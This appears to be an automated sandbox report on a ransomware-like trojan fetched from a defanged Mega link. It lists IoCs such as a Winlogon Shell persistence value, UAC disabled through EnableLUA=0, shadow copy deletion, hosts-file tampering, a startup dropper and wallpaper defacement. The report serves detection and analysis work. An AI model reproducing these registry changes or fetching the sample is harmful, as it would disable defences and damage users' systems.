hxxps://mega[.]nz/file/zEch1KxI#B3YpDGY2n4etjH6ApJ1WtcW82yTAOg48vgpSSZ6vlRY

Analysis

max time kernel
300s
max time network
279s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
21/05/2024, 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/zEch1KxI#B3YpDGY2n4etjH6ApJ1WtcW82yTAOg48vgpSSZ6vlRY

Score

10^/10

defense_evasion evasion execution impact persistence pyinstaller ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	\??\c:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	\??\c:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Installed Components in the registry 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,348,22000,0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,348,22000,0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,348,22000,0"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,348,22000,0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe

Executes dropped EXE 64 IoCs

pid	Process
1596	3MB Online Install.exe
672	Start.exe
3372	curl.exe
1608	Driver.exe
3040	3MB Online Install.exe
2300	Start.exe
1612	curl.exe
1600	clown.exe
1276	startban.exe
1328	def.exe
1736	startcur.exe
2404	startkey.exe
744	ban.exe
4264	DisDef.exe
248	ban.exe
3020	cur.exe
4736	key.exe
980	7z.exe
3020	startdelstartup.exe
2600	startuac.exe
2364	startauto.exe
3040	startWinlog.exe
3792	startExplorerIcons.exe
3412	starticons.exe
5136	auto.exe
5144	uac.exe
5256	ExplorerIcons.exe
5320	delstartup.exe
5508	icons.exe
5804	starthosts.exe
5848	startWPChanger.exe
5860	clown.exe
5888	Winlog.exe
6128	startvol.exe
6136	startScreenBlocker.exe
1064	startcur.exe
1428	attention.exe
5504	hosts.exe
4132	startWinlog.exe
3004	startf.exe
4492	startban.exe
2972	wp.exe
4664	ScreenBlocker.exe
4876	cur.exe
5824	form.exe
4084	vol.exe
3944	Winlog.exe
4468	ban.exe
5140	ban.exe
5024	WPChanger.exe
1788	f.exe
6004	wp.exe
5224	mpv.com
5708	hide.exe
5436	mpv.exe
1752	Driver.exe
4040	clown.exe
1996	startban.exe
5768	def.exe
5036	startcur.exe
5868	startkey.exe
6012	ban.exe
5680	key.exe
5520	DisDef.exe

Loads dropped DLL 46 IoCs

pid	Process
248	ban.exe
248	ban.exe
248	ban.exe
248	ban.exe
248	ban.exe
248	ban.exe
248	ban.exe
980	7z.exe
5140	ban.exe
5140	ban.exe
5140	ban.exe
5140	ban.exe
5140	ban.exe
5140	ban.exe
5140	ban.exe
5524	ban.exe
5524	ban.exe
5524	ban.exe
5524	ban.exe
5524	ban.exe
5524	ban.exe
5524	ban.exe
5216	7z.exe
288	ban.exe
288	ban.exe
288	ban.exe
288	ban.exe
288	ban.exe
288	ban.exe
288	ban.exe
4800	VideoPlayer.exe
4800	VideoPlayer.exe
4800	VideoPlayer.exe
4800	VideoPlayer.exe
1300	VideoPlayer.exe
1300	VideoPlayer.exe
1300	VideoPlayer.exe
1300	VideoPlayer.exe
5072	VideoPlayer.exe
5072	VideoPlayer.exe
5072	VideoPlayer.exe
5072	VideoPlayer.exe
8	VideoPlayer.exe
8	VideoPlayer.exe
8	VideoPlayer.exe
8	VideoPlayer.exe

Modifies system executable filetype association 2 TTPs 8 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	VideoPlayer.exe
File opened (read-only)	\??\H:	VideoPlayer.exe
File opened (read-only)	\??\J:	VideoPlayer.exe
File opened (read-only)	\??\L:	VideoPlayer.exe
File opened (read-only)	\??\X:	VideoPlayer.exe
File opened (read-only)	\??\Y:	VideoPlayer.exe
File opened (read-only)	\??\E:	VideoPlayer.exe
File opened (read-only)	\??\I:	VideoPlayer.exe
File opened (read-only)	\??\E:	VideoPlayer.exe
File opened (read-only)	\??\O:	VideoPlayer.exe
File opened (read-only)	\??\T:	VideoPlayer.exe
File opened (read-only)	\??\E:	VideoPlayer.exe
File opened (read-only)	\??\B:	VideoPlayer.exe
File opened (read-only)	\??\R:	VideoPlayer.exe
File opened (read-only)	\??\H:	VideoPlayer.exe
File opened (read-only)	\??\Q:	VideoPlayer.exe
File opened (read-only)	\??\H:	VideoPlayer.exe
File opened (read-only)	\??\L:	VideoPlayer.exe
File opened (read-only)	\??\R:	VideoPlayer.exe
File opened (read-only)	\??\O:	VideoPlayer.exe
File opened (read-only)	\??\P:	VideoPlayer.exe
File opened (read-only)	\??\U:	VideoPlayer.exe
File opened (read-only)	\??\G:	VideoPlayer.exe
File opened (read-only)	\??\A:	VideoPlayer.exe
File opened (read-only)	\??\Z:	VideoPlayer.exe
File opened (read-only)	\??\G:	VideoPlayer.exe
File opened (read-only)	\??\U:	VideoPlayer.exe
File opened (read-only)	\??\H:	VideoPlayer.exe
File opened (read-only)	\??\W:	VideoPlayer.exe
File opened (read-only)	\??\L:	VideoPlayer.exe
File opened (read-only)	\??\N:	VideoPlayer.exe
File opened (read-only)	\??\M:	VideoPlayer.exe
File opened (read-only)	\??\K:	VideoPlayer.exe
File opened (read-only)	\??\N:	VideoPlayer.exe
File opened (read-only)	\??\X:	VideoPlayer.exe
File opened (read-only)	\??\S:	VideoPlayer.exe
File opened (read-only)	\??\Y:	VideoPlayer.exe
File opened (read-only)	\??\N:	VideoPlayer.exe
File opened (read-only)	\??\B:	VideoPlayer.exe
File opened (read-only)	\??\O:	VideoPlayer.exe
File opened (read-only)	\??\S:	VideoPlayer.exe
File opened (read-only)	\??\K:	VideoPlayer.exe
File opened (read-only)	\??\B:	VideoPlayer.exe
File opened (read-only)	\??\I:	VideoPlayer.exe
File opened (read-only)	\??\Z:	VideoPlayer.exe
File opened (read-only)	\??\X:	VideoPlayer.exe
File opened (read-only)	\??\S:	VideoPlayer.exe
File opened (read-only)	\??\Z:	VideoPlayer.exe
File opened (read-only)	\??\V:	VideoPlayer.exe
File opened (read-only)	\??\W:	VideoPlayer.exe
File opened (read-only)	\??\J:	VideoPlayer.exe
File opened (read-only)	\??\V:	VideoPlayer.exe
File opened (read-only)	\??\S:	VideoPlayer.exe
File opened (read-only)	\??\R:	VideoPlayer.exe
File opened (read-only)	\??\Q:	VideoPlayer.exe
File opened (read-only)	\??\N:	VideoPlayer.exe
File opened (read-only)	\??\M:	VideoPlayer.exe
File opened (read-only)	\??\L:	VideoPlayer.exe
File opened (read-only)	\??\V:	VideoPlayer.exe
File opened (read-only)	\??\M:	VideoPlayer.exe
File opened (read-only)	\??\E:	VideoPlayer.exe
File opened (read-only)	\??\K:	VideoPlayer.exe
File opened (read-only)	\??\A:	VideoPlayer.exe
File opened (read-only)	\??\J:	VideoPlayer.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\Wallpaper = "C:\\java\\Wallpaper\\wallpaper.bmp"	WPChanger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\Wallpaper = "C:\\java\\Wallpaper\\wallpaper.bmp"	WPChanger.exe

Drops file in Windows directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001900000002ac18-485.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 12 IoCs

evasion

pid	Process
5324	timeout.exe
3000	timeout.exe
5224	timeout.exe
3548	timeout.exe
3744	timeout.exe
952	timeout.exe
5820	timeout.exe
5632	timeout.exe
5604	timeout.exe
5468	timeout.exe
5960	timeout.exe
5828	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 20 IoCs

evasion

pid	Process
3020	taskkill.exe
5048	taskkill.exe
5496	taskkill.exe
672	taskkill.exe
3304	taskkill.exe
4960	taskkill.exe
2104	taskkill.exe
3140	taskkill.exe
2824	taskkill.exe
5332	taskkill.exe
2148	taskkill.exe
5612	taskkill.exe
4312	taskkill.exe
4836	taskkill.exe
5232	taskkill.exe
1928	taskkill.exe
5880	taskkill.exe
4120	taskkill.exe
6032	taskkill.exe
1612	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\TileWallpaper = "0"	WPChanger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\TileWallpaper = "0"	WPChanger.exe

Modifies File Icons 64 IoCs

ransomware

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\107 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\15 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\101 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\106 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\67 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\90 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\100 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\113 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\24 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\14 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\41 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\38 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\110 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\17 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\69 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\73 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\85 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\92 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\52 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\77 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\14 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\7 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\24 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\126 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\93 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\57 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\82 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\96 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\103 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\39 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\130 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\112 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\129 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	ie4uinit.exe
